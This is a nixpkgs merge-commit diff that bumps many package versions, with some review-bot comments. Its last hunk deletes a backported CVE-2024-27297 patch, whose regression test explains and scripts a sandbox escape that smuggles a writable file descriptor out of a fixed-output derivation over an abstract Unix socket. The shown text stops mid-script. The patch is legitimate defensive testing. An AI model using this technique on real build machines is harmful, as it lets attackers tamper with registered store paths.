Merge master into staging-next

github-actions[bot] 2024-04-28 18:01:03 +00:00 committed by GitHub
commit 69117017f0
22 changed files with 334 additions and 566 deletions


@ -6,11 +6,11 @@ stdenv.mkDerivation (finalAttrs: let
in
{
pname = "remnote";
version = "1.15.4";
version = "1.16.4";
src = fetchurl {
url = "https://download.remnote.io/remnote-desktop/RemNote-${version}.AppImage";
hash = "sha256-6WBdTOj/seinx1wJGb/4if3PzCPmtzHyNAFmQwmsrvE=";
hash = "sha256-dgbQ0cbPq7BSQ9VwwH6+GoAxb85HDxRixfjeDJBtOrg=";
};
appexec = appimageTools.wrapType2 {


@ -298,9 +298,6 @@ buildStdenv.mkDerivation {
setOutputFlags = false; # `./mach configure` doesn't understand `--*dir=` flags.
preConfigure = ''
# remove distributed configuration files
rm -f configure js/src/configure .mozconfig*
# Runs autoconf through ./mach configure in configurePhase
configureScript="$(realpath ./mach) configure"
@ -308,8 +305,8 @@ buildStdenv.mkDerivation {
export MOZ_BUILD_DATE=$(head -n1 sourcestamp.txt)
# Set predictable directories for build and state
export MOZ_OBJDIR=$(pwd)/mozobj
export MOZBUILD_STATE_PATH=$(pwd)/mozbuild
export MOZ_OBJDIR=$(pwd)/objdir
export MOZBUILD_STATE_PATH=$TMPDIR/mozbuild
# Don't try to send libnotify notifications during build
export MOZ_NOSPAM=1
@ -353,7 +350,7 @@ buildStdenv.mkDerivation {
# since the profiling build has not been installed to $out
''
OLD_LDFLAGS="$LDFLAGS"
LDFLAGS="-Wl,-rpath,$(pwd)/mozobj/dist/${binaryName}"
LDFLAGS="-Wl,-rpath,$(pwd)/objdir/dist/${binaryName}"
''}
fi
'' + lib.optionalString googleAPISupport ''
@ -510,7 +507,7 @@ buildStdenv.mkDerivation {
'';
preBuild = ''
cd mozobj
cd objdir
'';
postBuild = ''
@ -535,9 +532,9 @@ buildStdenv.mkDerivation {
preInstall = lib.optionalString crashreporterSupport ''
./mach buildsymbols
mkdir -p $symbols/
cp mozobj/dist/*.crashreporter-symbols.zip $symbols/
cp objdir/dist/*.crashreporter-symbols.zip $symbols/
'' + ''
cd mozobj
cd objdir
'';
postInstall = ''


@ -1,14 +1,20 @@
{ lib, stdenv, fetchFromGitLab }:
{
lib,
stdenv,
fetchFromGitLab,
runCommand,
mafft,
}:
stdenv.mkDerivation rec {
stdenv.mkDerivation (finalAttrs: {
pname = "mafft";
version = "7.525";
version = "7.526";
src = fetchFromGitLab {
owner = "sysimm";
repo = pname;
rev = "v${version}";
sha256 = "sha256-ckBmvFssYAmYcBHAEftjQqBV0MB0theGfemaPx3XUws=";
repo = "mafft";
rev = "v${finalAttrs.version}";
hash = "sha256-VNe00r12qEkLEbpZdJCe5xZ73JA3uAmuAeG+eSeRDI0=";
};
preBuild = ''
@ -16,14 +22,34 @@ stdenv.mkDerivation rec {
make clean
'';
makeFlags = [ "CC=${stdenv.cc.targetPrefix}cc" "PREFIX=$(out)" ];
makeFlags = [
"CC=${stdenv.cc.targetPrefix}cc"
"PREFIX=$(out)"
];
meta = with lib;
{
description = "Multiple alignment program for amino acid or nucleotide sequences";
homepage = "https://mafft.cbrc.jp/alignment/software/";
license = licenses.bsd3;
maintainers = with maintainers; [ natsukium ];
platforms = platforms.unix;
};
}
passthru.tests = {
simple = runCommand "${finalAttrs.pname}-test" { } ''
mkdir $out
cd ${finalAttrs.src}/test
${lib.getExe mafft} sample > $out/test.fftns2
${lib.getExe mafft} --maxiterate 100 sample > $out/test.fftnsi
${lib.getExe mafft} --globalpair sample > $out/test.gins1
${lib.getExe mafft} --globalpair --maxiterate 100 sample > $out/test.ginsi
${lib.getExe mafft} --localpair sample > $out/test.lins1
${lib.getExe mafft} --localpair --maxiterate 100 sample > $out/test.linsi
diff $out/test.fftns2 sample.fftns2
diff $out/test.fftnsi sample.fftnsi
diff $out/test.gins1 sample.gins1
diff $out/test.ginsi sample.ginsi
diff $out/test.lins1 sample.lins1
'';
};
meta = with lib; {
description = "Multiple alignment program for amino acid or nucleotide sequences";
homepage = "https://mafft.cbrc.jp/alignment/software/";
license = licenses.bsd3;
maintainers = with maintainers; [ natsukium ];
platforms = platforms.unix;
};
})
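Review bot: The new `passthru.tests.simple` produces `test.linsi` but never compares it: six mafft invocations write fftns2, fftnsi, gins1, ginsi, lins1 and linsi outputs, while only the first five get a `diff` line, so a regression in the `--localpair --maxiterate 100` mode would not fail the test. Assuming the upstream `test` directory ships a `sample.linsi` reference next to the other samples, add `diff $out/test.linsi sample.linsi` after the lins1 comparison; if it does not, drop the unused invocation so the test does not spend time on output it never checks.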


@ -8,14 +8,14 @@
}:
python3Packages.buildPythonApplication rec {
pname = "labelle";
version = "1.1.0";
version = "1.2.0";
pyproject = true;
src = fetchFromGitHub {
owner = "labelle-org";
repo = "labelle";
rev = "v${version}";
hash = "sha256-JnV5A3/toTCHCEb0dygouR9MZfk2kdmsKVscwYI2y/Y=";
hash = "sha256-fLlYqJs/V5t8IdfVkfBsjtjM1rRdCyTYF87G+h1VU5Y=";
};
postPatch = ''
@ -39,6 +39,8 @@ python3Packages.buildPythonApplication rec {
pyqt6
python-barcode
pyusb
rich
typer
];
desktopItems = [


@ -5,14 +5,14 @@
python3.pkgs.buildPythonApplication rec {
pname = "tuifimanager";
version = "4.0.0";
version = "4.0.5";
format = "pyproject";
src = fetchFromGitHub {
owner = "GiorgosXou";
repo = "TUIFIManager";
rev = "v${version}";
hash = "sha256-bv/+x2xppUK9i3HOm93FIQRu1xlB4wCKZzAapkVlrM0=";
rev = "refs/tags/v${version}";
hash = "sha256-DuCrIJuADmJ0MHIP0+OJ0zCrQR/oGdgzJ1xck4m/tPo=";
};
nativeBuildInputs = [
@ -34,7 +34,6 @@ python3.pkgs.buildPythonApplication rec {
attempt to get more attention to the Uni-Curses project.
'';
homepage = "https://github.com/GiorgosXou/TUIFIManager";
changelog = "https://github.com/GiorgosXou/TUIFIManager/blob/${src.rev}/CHANGELOG.md";
license = licenses.gpl3Only;
maintainers = with maintainers; [ michaelBelsanti sigmanificient ];
mainProgram = "tuifi";


@ -20,13 +20,13 @@
stdenv.mkDerivation (finalAttrs: {
pname = "wlogout";
version = "1.2.1";
version = "1.2.2";
src = fetchFromGitHub {
owner = "ArtsyMacaw";
repo = "wlogout";
rev = finalAttrs.version;
hash = "sha256-n8r+E6GXXjyDYBTOMiv5musamaUFSpRTM2qHgb047og=";
hash = "sha256-/tYZy56ku68ziSOhy6Dex9RGy+blkU6CN2ze76y7718=";
};
outputs = [ "out" "man" ];


@ -1,5 +1,5 @@
{ lib
, writeShellScript
, writeShellApplication
, coreutils
, git
, nix
@ -10,114 +10,162 @@
# commit.
{ url ? null # The git url, if empty it will be set to src.gitRepoUrl
, branch ? null
, stableVersion ? false # Use version format according to RFC 107 (i.e. LAST_TAG+date=YYYY-MM-DD)
, tagPrefix ? "" # strip this prefix from a tag name when using stable version
, hardcodeZeroVersion ? false # Use a made-up version "0" instead of latest tag. Use when there is no previous release, or the project's tagging system is incompatible with what we expect from versions
, tagFormat ? "*" # A `git describe --tags --match '<format>'` pattern that tags must match to be considered
, tagPrefix ? null # strip this prefix from a tag name
, tagConverter ? null # A command to convert more complex tag formats. It receives the git tag via stdin and should convert it into x.y.z format to stdout
, shallowClone ? true
}:
assert lib.asserts.assertMsg (tagPrefix == null || tagConverter == null) "Can only use either tagPrefix or tagConverter!";
let
updateScript = writeShellScript "unstable-update-script.sh" ''
set -ex
updateScript = writeShellApplication {
name = "unstable-update-script";
runtimeInputs = [
common-updater-scripts
coreutils
git
nix
];
text = ''
set -ex
url=""
branch=""
use_stable_version=""
tag_prefix=""
shallow_clone=""
url=""
branch=""
hardcode_zero_version=""
tag_format=""
tag_prefix=""
tag_converter=""
shallow_clone=""
: "''${systemArg:=}"
while (( $# > 0 )); do
flag="$1"
shift 1
case "$flag" in
--url=*)
url="''${flag#*=}"
;;
--branch=*)
branch="''${flag#*=}"
;;
--use-stable-version)
use_stable_version=1
;;
--tag-prefix=*)
tag_prefix="''${flag#*=}"
;;
--shallow-clone)
shallow_clone=1
;;
*)
echo "$0: unknown option ''${flag}"
exit 1
;;
esac
done
while (( $# > 0 )); do
flag="$1"
shift 1
case "$flag" in
--url=*)
url="''${flag#*=}"
;;
--branch=*)
branch="''${flag#*=}"
;;
--hardcode-zero-version)
hardcode_zero_version=1
;;
--tag-format=*)
tag_format="''${flag#*=}"
;;
--tag-prefix=*)
tag_prefix="''${flag#*=}"
;;
--tag-converter=*)
tag_converter="''${flag#*=}"
;;
--shallow-clone)
shallow_clone=1
;;
*)
echo "$0: unknown option ''${flag}"
exit 1
;;
esac
done
# By default we set url to src.gitRepoUrl
if [[ -z "$url" ]]; then
url="$(${nix}/bin/nix-instantiate $systemArg --eval -E \
"with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \
| tr -d '"')"
fi
# By default we set url to src.gitRepoUrl
if [[ -z "$url" ]]; then
# system argument cannot be passed as 1 argument
# shellcheck disable=SC2086
url="$(nix-instantiate $systemArg --eval -E \
"with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \
| tr -d '"')"
fi
# Get info about HEAD from a shallow git clone
tmpdir="$(${coreutils}/bin/mktemp -d)"
# Get info about HEAD from a shallow git clone
tmpdir="$(mktemp -d)"
cloneArgs=(
--bare
)
cloneArgs=()
if [[ "$shallow_clone" == "1" ]]; then
cloneArgs+=(--depth=1)
fi
if [[ "$shallow_clone" == "1" ]]; then
cloneArgs+=(--depth=1)
fi
if [[ -n "$branch" ]]; then
cloneArgs+=(--branch="$branch")
fi
if [[ -n "$branch" ]]; then
cloneArgs+=(--branch="$branch")
fi
${git}/bin/git clone "''${cloneArgs[@]}" "$url" "$tmpdir"
git clone "''${cloneArgs[@]}" "$url" "$tmpdir"
getLatestVersion() {
git describe --tags --abbrev=0 --match "''${tag_format}" 2> /dev/null || true
}
pushd "$tmpdir"
commit_date="$(${git}/bin/git show -s --pretty='format:%cs')"
commit_sha="$(${git}/bin/git show -s --pretty='format:%H')"
if [[ -z "$use_stable_version" ]]; then
new_version="unstable-$commit_date"
else
depth=100
while (( $depth < 10000 )); do
last_tag="$(${git}/bin/git describe --tags --abbrev=0 2> /dev/null || true)"
if [[ -n "$last_tag" ]]; then
break
fi
${git}/bin/git fetch --depth="$depth" --tags
depth=$(( $depth * 2 ))
done
if [[ -z "$last_tag" ]]; then
echo "Cound not found a tag within last 10000 commits" > /dev/stderr
exit 1
fi
if [[ -n "$tag_prefix" ]]; then
last_tag="''${last_tag#$tag_prefix}"
fi
new_version="$last_tag+date=$commit_date"
fi
popd
# ${coreutils}/bin/rm -rf "$tmpdir"
pushd "$tmpdir"
commit_date="$(git show -s --pretty='format:%cs')"
commit_sha="$(git show -s --pretty='format:%H')"
last_tag=""
if [[ -z "$hardcode_zero_version" ]]; then
if [[ "$shallow_clone" == "1" ]]; then
depth=100
while (( depth < 10000 )); do
last_tag="$(getLatestVersion)"
if [[ -n "$last_tag" ]]; then
break
fi
git fetch --depth="$depth" --tags
depth=$(( depth * 2 ))
done
# update the nix expression
${common-updater-scripts}/bin/update-source-version \
"$UPDATE_NIX_ATTR_PATH" \
"$new_version" \
--rev="$commit_sha"
'';
if [[ -z "$last_tag" ]]; then
# To be extra sure, check if full history helps with finding a tag
git fetch --tags
last_tag="$(getLatestVersion)"
fi
else
last_tag="$(getLatestVersion)"
fi
if [[ -z "$last_tag" ]]; then
last_tag="0"
fi
if [[ -n "$tag_prefix" ]]; then
echo "Stripping prefix '$tag_prefix' from tag '$last_tag'"
last_tag="''${last_tag#"''${tag_prefix}"}"
fi
if [[ -n "$tag_converter" ]]; then
echo "Running '$last_tag' through: $tag_converter"
last_tag="$(echo "''${last_tag}" | ''${tag_converter})"
fi
else
last_tag="0"
fi
if [[ ! "$last_tag" =~ ^[[:digit:]] ]]; then
echo "Last tag '$last_tag' does not start with a digit" > /dev/stderr
exit 1
fi
new_version="$last_tag-unstable-$commit_date"
popd
# rm -rf "$tmpdir"
# update the nix expression
update-source-version \
"$UPDATE_NIX_ATTR_PATH" \
"$new_version" \
--rev="$commit_sha"
'';
};
in
[
updateScript
(lib.getExe updateScript)
"--url=${builtins.toString url}"
"--tag-format=${tagFormat}"
] ++ lib.optionals (branch != null) [
"--branch=${branch}"
] ++ lib.optionals stableVersion [
"--use-stable-version"
] ++ lib.optionals (tagPrefix != null) [
"--tag-prefix=${tagPrefix}"
] ++ lib.optionals (tagConverter != null) [
"--tag-converter=${tagConverter}"
] ++ lib.optionals hardcodeZeroVersion [
"--hardcode-zero-version"
] ++ lib.optionals shallowClone [
"--shallow-clone"
]
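Review bot: The tag lookup now silently falls back to `last_tag="0"` when `getLatestVersion` finds nothing (the `if [[ -z "$last_tag" ]]` after the full-history fetch), where the old script aborted with an error; a mistyped `--tag-format`, a wrong `--branch`, or a repository whose tags live outside the fetched refs now yields a plausible-looking `0-unstable-<date>` version that is indistinguishable from the result of `--hardcode-zero-version`. Keep the fallback if it is intended, but make it visible in the updater log: `echo "No tag matching '$tag_format' found; falling back to version 0" >&2` before the assignment. Separately, `$tag_converter` is expanded unquoted on purpose so the converter can carry its own arguments; a comment such as `# intentionally unquoted: the converter may include arguments` would stop a later shellcheck pass from "fixing" it.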


@ -1,30 +1,36 @@
{ stdenv
, lib
, fetchpatch
, fetchurl
, meson
, ninja
, pkg-config
, gi-docgen
, gobject-introspection
, lcms2
, vala
}:
stdenv.mkDerivation rec {
stdenv.mkDerivation (finalAttrs: {
pname = "babl";
version = "0.1.106";
version = "0.1.108";
outputs = [ "out" "dev" ];
outputs = [ "out" "dev" "devdoc" ];
src = fetchurl {
url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor version}/babl-${version}.tar.xz";
hash = "sha256-0yUTXTME8IjBNMxiABOs8DXeLl0SWlCi2RBU5zd8QV8=";
url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor finalAttrs.version}/babl-${finalAttrs.version}.tar.xz";
hash = "sha256-Jt7+neqresTQ4HbKtJwqDW69DfDDH9IJklpfB+3uFHU=";
};
patches = [
# Allow overriding path to dev output that will be hardcoded e.g. in pkg-config file.
./dev-prefix.patch
];
nativeBuildInputs = [
meson
ninja
pkg-config
gi-docgen
gobject-introspection
vala
];
@ -33,6 +39,15 @@ stdenv.mkDerivation rec {
lcms2
];
mesonFlags = [
"-Dprefix-dev=${placeholder "dev"}"
];
postFixup = ''
# Cannot be in postInstall, otherwise _multioutDocs hook in preFixup will move right back.
moveToOutput "share/doc" "$devdoc"
'';
meta = with lib; {
description = "Image pixel format conversion library";
mainProgram = "babl";
@ -42,4 +57,4 @@ stdenv.mkDerivation rec {
maintainers = with maintainers; [ jtojnar ];
platforms = platforms.unix;
};
}
})


@ -0,0 +1,29 @@
diff --git a/meson.build b/meson.build
index 2350a1f..56f015d 100644
--- a/meson.build
+++ b/meson.build
@@ -551,7 +551,7 @@ pkgconfig.generate(
variables: [
'datadir=${prefix}/share',
'pluginsdir=${libdir}/@0@'.format(lib_name),
- 'girdir=${datadir}/gir-1.0',
+ 'girdir=@0@/share/gir-1.0'.format(get_option('prefix-dev')),
'typelibdir=${libdir}/girepository-1.0',
],
uninstalled_variables: [
diff --git a/meson_options.txt b/meson_options.txt
index f9d558c..3cac593 100644
--- a/meson_options.txt
+++ b/meson_options.txt
@@ -9,6 +9,11 @@ option('enable-gir',
choices: ['auto', 'true', 'false'],
description: 'gobject introspection .gir generation'
)
+option('prefix-dev',
+ type: 'string',
+ value: '',
+ description: 'Like prefix but for dev output of the package'
+)
option('enable-vapi',
type: 'boolean',
value: 'true',
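Review bot: The new `prefix-dev` option defaults to the empty string, so when it is not passed the patched `girdir` line in meson.build expands to `/share/gir-1.0` instead of the previous `${datadir}/gir-1.0`; this is harmless for the nixpkgs build, which always sets `-Dprefix-dev`, but it makes the patch wrong for any other consumer of the same patch. Falling back to the regular prefix keeps both cases correct: `'girdir=@0@/share/gir-1.0'.format(get_option('prefix-dev') != '' ? get_option('prefix-dev') : get_option('prefix'))`, which reproduces the old `${prefix}/share` location when the option is unset.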


@ -125,8 +125,8 @@ rec {
};
wlroots_0_17 = generic {
version = "0.17.2";
hash = "sha256-Of9qykyVnBURc5A2pvCMm7sLbnuuG7OPWLxodQLN2Xg=";
version = "0.17.3";
hash = "sha256-jth6BKci3sVDC86o+gSHKyDWnibVcNmipm7nn0S6LTg=";
extraBuildInputs = [
ffmpeg
hwdata


@ -14,14 +14,14 @@
buildPythonPackage rec {
pname = "anywidget";
version = "0.9.9";
version = "0.9.10";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-vs5tYcVabzlkCeu1p20mDo9LIh+cUeUWFQc3o18WUu8=";
hash = "sha256-OQpigkCYHAmBPHUjJ53cq4L/T9Moet1UM7eLE2kIkGg=";
};
# We do not need the jupyterlab build dependency, because we do not need to


@ -2,7 +2,7 @@
, buildPythonPackage
, fetchPypi
, pythonOlder
, jupyter-packaging
, hatchling
, ipywidgets
, numpy
, pillow
@ -10,14 +10,14 @@
buildPythonPackage rec {
pname = "ipycanvas";
version = "0.13.1";
format = "pyproject";
version = "0.13.2";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-+cOUBoG8ODgzkPjEbqXYRF1uEcbaZITDfYnfWuHawTE=";
hash = "sha256-Ujh9nYf2WVXzlVL7eSfEReXl5JN9hTgU2RDL6O+g+3k=";
};
# We relax dependencies here instead of pulling in a patch because upstream
@ -26,13 +26,16 @@ buildPythonPackage rec {
#
postPatch = ''
substituteInPlace pyproject.toml \
--replace '"jupyterlab==3.*",' "" \
--replace 'jupyter_packaging~=' 'jupyter_packaging>='
--replace-fail '"jupyterlab>=3,<5",' "" \
'';
nativeBuildInputs = [ jupyter-packaging ];
build-system = [
hatchling
];
propagatedBuildInputs = [ ipywidgets numpy pillow ];
env.HATCH_BUILD_NO_HOOKS = true;
dependencies = [ ipywidgets numpy pillow ];
doCheck = false; # tests are in Typescript and require `npx` and `chromium`
pythonImportsCheck = [ "ipycanvas" ];
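Review bot: `env.HATCH_BUILD_NO_HOOKS = true` disables every hatch build hook for this package, which for a Jupyter widget presumably includes the step that produces the JavaScript assets, so the derivation is only correct if the PyPI sdist already ships them — nothing in the hunk records or verifies that. `pythonImportsCheck = [ "ipycanvas" ]` still passes when the nbextension/labextension directories are missing, so a one-line comment stating why the hooks are safe to skip (e.g. `# the sdist ships the prebuilt JS assets, so the jupyter builder hook is not needed`) and an install-time check that those asset directories exist under `$out` would make the intent auditable. Switching to `--replace-fail` is the right call here, since a silently no-op substitution was the earlier failure mode.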


@ -3,21 +3,21 @@
, fetchPypi
, pythonOlder
, hatchling
, hatch-jupyter-builder
, hatch-vcs
, anywidget
, pytestCheckHook
}:
buildPythonPackage rec {
pname = "ipyniivue";
version = "2.0.0";
version = "2.0.1";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-CvMSUvPyXxPexs0/0sa/xt65RFWtvmYZwGSMIQGvLkc=";
hash = "sha256-C0mYkguN4ZfxSLqETH3dUwXeoNcicrmAgp6e9IIT43s=";
};
# We do not need the build hooks, because we do not need to
@ -26,7 +26,7 @@ buildPythonPackage rec {
build-system = [
hatchling
hatch-jupyter-builder
hatch-vcs
];
dependencies = [ anywidget ];


@ -21,7 +21,7 @@
buildPythonPackage rec {
pname = "jupyterlab-server";
version = "2.26.0";
version = "2.27.1";
pyproject = true;
disabled = pythonOlder "3.8";
@ -29,7 +29,7 @@ buildPythonPackage rec {
src = fetchPypi {
pname = "jupyterlab_server";
inherit version;
hash = "sha256-mzupHPKDf38ST8o21j88qArOK+1ImKY91H5lmMGrAG8=";
hash = "sha256-CXtaxwm2dscoSsnF43PxGTClYfUs1ahuT8flqcioYx0=";
};
postPatch = ''


@ -20,14 +20,14 @@
buildPythonPackage rec {
pname = "jupyterlab";
version = "4.1.6";
version = "4.1.8";
pyproject = true;
disabled = pythonOlder "3.8";
src = fetchPypi {
inherit pname version;
hash = "sha256-eTXza6JuthUYOk9cK7yleRtRCM4qALVQX4z9EA1TZI4=";
hash = "sha256-M4St7YaA585QT9Y7i7iaOd8hycdpTZ59xKaHQs2zD5s=";
};
nativeBuildInputs = [


@ -1,40 +1,50 @@
{ lib
, buildPythonPackage
, fetchPypi
, fastprogress
, pythonRelaxDepsHook
, setuptools
, ipywidgets
, fastcore
, asttokens
, astunparse
, watchdog
, execnb
, ghapi
, pyyaml
, quarto
, pythonOlder
}:
buildPythonPackage rec {
pname = "nbdev";
version = "2.3.13";
format = "setuptools";
version = "2.3.14";
pyproject = true;
disabled = pythonOlder "3.7";
src = fetchPypi {
inherit pname version;
hash = "sha256-Umkf3CcRRSS+pK3UKeTg+Ru3TW+qHNoQ2F6nUk8jQUU=";
hash = "sha256-9Tacr4mWmjXspKKCkFDWYeT7KkBh4/3f6UOkfj0/leg=";
};
propagatedBuildInputs = [
fastprogress
fastcore
asttokens
nativeBuildInputs = [
pythonRelaxDepsHook
];
pythonRelaxDeps = [
"ipywidgets"
];
build-system = [
setuptools
];
dependencies = [
astunparse
watchdog
execnb
fastcore
ghapi
ipywidgets
pyyaml
quarto
watchdog
];
# no real tests
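Review bot: `pythonRelaxDeps = [ "ipywidgets" ]` is added without saying which upstream pin it overrides, so a later reader cannot tell when the relaxation can be dropped again; a trailing comment such as `# upstream pins an older ipywidgets than nixpkgs provides — TODO record the pinned range` (the pin itself is not visible in this hunk, so confirm it against the sdist metadata) keeps that knowledge with the code. Because the `# no real tests` comment below indicates the package is not exercised at build time, the relaxed bound is effectively untested, which is one more reason to document it.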


@ -7,13 +7,13 @@
buildPythonPackage rec {
pname = "nvidia-ml-py";
version = "12.535.133";
version = "12.550.52";
format = "setuptools";
src = fetchPypi {
inherit pname version;
extension = "tar.gz";
hash = "sha256-sVWa8NV90glVv1jQWv/3sWbd1ElH6zBRyZBWOHmesdw=";
hash = "sha256-3+3XFDNccuZaMshun12xzUlSbUTW2McoCdmWlY9zTAc=";
};
patches = [


@ -1,5 +1,7 @@
{ lib
, stdenv
, aiohttp
, ansicolors
, azure-datalake-store
, azure-identity
, azure-storage-blob
@ -17,8 +19,8 @@
, pygithub
, pytest-mock
, pytestCheckHook
, pythonAtLeast
, pythonOlder
, pythonRelaxDepsHook
, pyyaml
, requests
, setuptools
@ -28,7 +30,7 @@
buildPythonPackage rec {
pname = "papermill";
version = "2.5.0";
version = "2.6.0";
pyproject = true;
disabled = pythonOlder "3.8";
@ -37,19 +39,14 @@ buildPythonPackage rec {
owner = "nteract";
repo = "papermill";
rev = "refs/tags/${version}";
hash = "sha256-x6f5hhTdOPDVFiBvRhfrXq1wd5keYiuUshXnT0IkjX0=";
hash = "sha256-NxC5+hRDdMCl/7ZIho5ml4hdENrgO+wzi87GRPeMv8Q=";
};
pythonRelaxDeps = [
"aiohttp"
];
nativeBuildInputs = [
pythonRelaxDepsHook
build-system = [
setuptools
];
propagatedBuildInputs = [
dependencies = [
click
pyyaml
nbformat
@ -58,6 +55,9 @@ buildPythonPackage rec {
requests
entrypoints
tenacity
ansicolors
] ++ lib.optionals (pythonAtLeast "3.12") [
aiohttp
];
passthru.optional-dependencies = {


@ -17,7 +17,7 @@
buildPythonPackage rec {
pname = "plotnine";
version = "0.13.4";
version = "0.13.5";
pyproject = true;
disabled = pythonOlder "3.9";
@ -26,7 +26,7 @@ buildPythonPackage rec {
owner = "has2k1";
repo = "plotnine";
rev = "refs/tags/v${version}";
hash = "sha256-ylsaV5yWVbxvD74spAI5tDwIjjue7MOMaGgp4Dc8Nhk=";
hash = "sha256-vGxsBcY4CRT4rBUq0AQ4oo0etKK+CtUD487VvnoK/rI=";
};
postPatch = ''


@ -133,11 +133,10 @@ let
in lib.makeExtensible (self: ({
nix_2_3 = ((common {
version = "2.3.17";
hash = "sha256-EK0pgHDekJFqr0oMj+8ANIjq96WPjICe2s0m4xkUdH4=";
version = "2.3.18";
hash = "sha256-jBz2Ub65eFYG+aWgSI3AJYvLSghio77fWQiIW1svA9U=";
patches = [
patch-monitorfdhup
./patches/2_3/CVE-2024-27297.patch
];
maintainers = with lib.maintainers; [ flokli raitobezarius ];
}).override { boehmgc = boehmgc-nix_2_3; }).overrideAttrs {
@ -157,8 +156,8 @@ in lib.makeExtensible (self: ({
};
nix_2_20 = common {
version = "2.20.5";
hash = "sha256-bfFe38BkoQws7om4gBtBWoNTLkt9piMXdLLoHYl+vBQ=";
version = "2.20.6";
hash = "sha256-BSl8Jijq1A4n1ToQy0t0jDJCXhJK+w1prL8QMHS5t54=";
};
nix_2_21 = common {
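Review bot: The `nix_2_3` hunk drops `./patches/2_3/CVE-2024-27297.patch` in the same change that bumps the version to 2.3.18, but neither the hunk nor the commit message records that 2.3.18 carries the upstream fix, which is the only thing that makes the deletion safe. A short comment next to `version = "2.3.18";` such as `# 2.3.18 includes the upstream fix for CVE-2024-27297 (FOD sandbox escape); the local backport is no longer needed` would let a reviewer check the claim against the release notes without digging through history, and the deletion of the patch file later in this commit will surface any other consumer that still referenced it. `patch-monitorfdhup` stays, so the `patches` list remains non-empty and the surrounding `override`/`overrideAttrs` expression is unaffected.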


@ -1,375 +0,0 @@
From 9c0be4c156e74a3e7e0d33b04d870642350e72d4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
<theophane.hufschmitt@tweag.io>
Date: Mon, 12 Feb 2024 21:28:20 +0100
Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape
Test that we can't leverage abstract unix domain sockets to leak file
descriptors out of the sandbox and modify the path after it has been
registered.
---
release.nix | 5 ++
tests/nixos/ca-fd-leak/default.nix | 93 ++++++++++++++++++++++++++++++
tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++
tests/nixos/ca-fd-leak/smuggler.c | 66 +++++++++++++++++++++
4 files changed, 229 insertions(+)
create mode 100644 tests/nixos/ca-fd-leak/default.nix
create mode 100644 tests/nixos/ca-fd-leak/sender.c
create mode 100644 tests/nixos/ca-fd-leak/smuggler.c
diff --git a/release.nix b/release.nix
index f468946c5..2e71f3796 100644
--- a/release.nix
+++ b/release.nix
@@ -235,6 +235,11 @@ let
nix = build.x86_64-linux; system = "x86_64-linux";
});
+ tests.ca-fd-leak = (import ./tests/nixos/ca-fd-leak rec {
+ inherit nixpkgs;
+ nix = build.x86_64-linux; system = "x86_64-linux";
+ });
+
tests.setuid = pkgs.lib.genAttrs
["i686-linux" "x86_64-linux"]
(system:
diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
new file mode 100644
index 000000000..c252caa4d
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -0,0 +1,93 @@
+# Nix is a sandboxed build system. But Not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ nixpkgs, system, nix }:
+
+with import (nixpkgs + "/nixos/lib/testing-python.nix") {
+ inherit system;
+};
+
+let
+ # Simple C program that sends a a file descriptor to `$out` to a Unix
+ # domain socket.
+ # Compiled statically so that we can easily send it to the VM and use it
+ # inside the build sandbox.
+ sender = pkgs.runCommandWith {
+ name = "sender";
+ stdenv = pkgs.pkgsStatic.stdenv;
+ } ''
+ $CC -static -o $out ${./sender.c}
+ '';
+
+ # Okay, so we have a file descriptor shipped out of the FOD now. But the
+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+ # lives in a mount namespace where it is not! So even when this file exists
+ # in the actual Nix store, we're capable of just modifying its contents...
+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+ # The abstract socket path used to exfiltrate the file descriptor
+ socketName = "FODSandboxExfiltrationSocket";
+in
+makeTest {
+ name = "ca-fd-leak";
+
+ nodes.machine =
+ { config, lib, pkgs, ... }:
+ { virtualisation.writableStore = true;
+ virtualisation.pathsInNixDB = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+ nix.binaryCaches = [ ];
+ nix.package = nix;
+ };
+
+ testScript = { nodes }: ''
+ start_all()
+
+ machine.succeed("echo hello")
+ # Start the smuggler server
+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+ # Build the smuggled derivation.
+ # This will connect to the smuggler server and send it the file descriptor
+ machine.succeed(r"""
+ nix-build -E '
+ builtins.derivation {
+ name = "smuggled";
+ system = builtins.currentSystem;
+ # look ma, no tricks!
+ outputHashMode = "flat";
+ outputHashAlgo = "sha256";
+ outputHash = builtins.hashString "sha256" "hello, world\n";
+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+ }'
+ """.strip())
+
+
+ # Tell the smuggler server that we're done
+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+ # Check that the file was modified
+ machine.succeed(r"""
+ cat ./result
